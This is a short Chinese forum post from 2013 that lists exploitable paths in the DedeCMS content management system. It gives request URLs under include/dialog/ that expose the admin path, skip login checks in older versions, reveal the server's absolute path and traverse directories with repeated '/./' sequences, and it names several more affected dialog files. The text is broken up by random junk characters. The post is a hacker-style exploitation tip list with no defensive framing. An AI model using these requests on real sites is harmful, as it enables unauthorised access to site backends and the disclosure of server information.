1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理! P' `3 R' f: n& j- E
0 [# j+ x( {! A( H, U, W- z' a
员帐号,新版本的就直接转向了后台.
8 w$ \! k5 k$ R6 M, `
& } ~ g) n3 }1 i8 h3 c2.include/dialog/config.php会爆出后台管理路径
' P \# a2 c% o* `8 I u% [4 D- [# p0 Q: P
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录8 A! ~3 a! B. R
! r6 F2 k0 i, D
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
3 C( N( u$ c# d8 d9 J) ]/ v. s4 v) u# J, p' H
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉! h& g( y$ ]# E
! u+ J. s2 V7 t) P: q% z
到根目录去.不过这些版本的访问地址有些不同.' b& V, s7 Z9 u/ @
地址为require/dialog/select_soft.php?activepath=/././././././././
/ `' c* c2 u* i4 v9 |5 m
- ~/ p9 G! G; [" O6 ]include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
5 Z" C$ Y8 \4 n. {( z4 C存在相同问题的文件还有6 W3 Y7 A) I7 n5 j4 V: X L5 \
include\dialog\select_images.php, b8 [; G( H: s- q0 a2 [: w
include\dialog\select_media.php
/ t/ k( g3 R4 qinclude\dialog\select_templets.php1 H( P Q5 t( n y
|
发表于 2013-4-16 16:50:43
收藏
支持
反对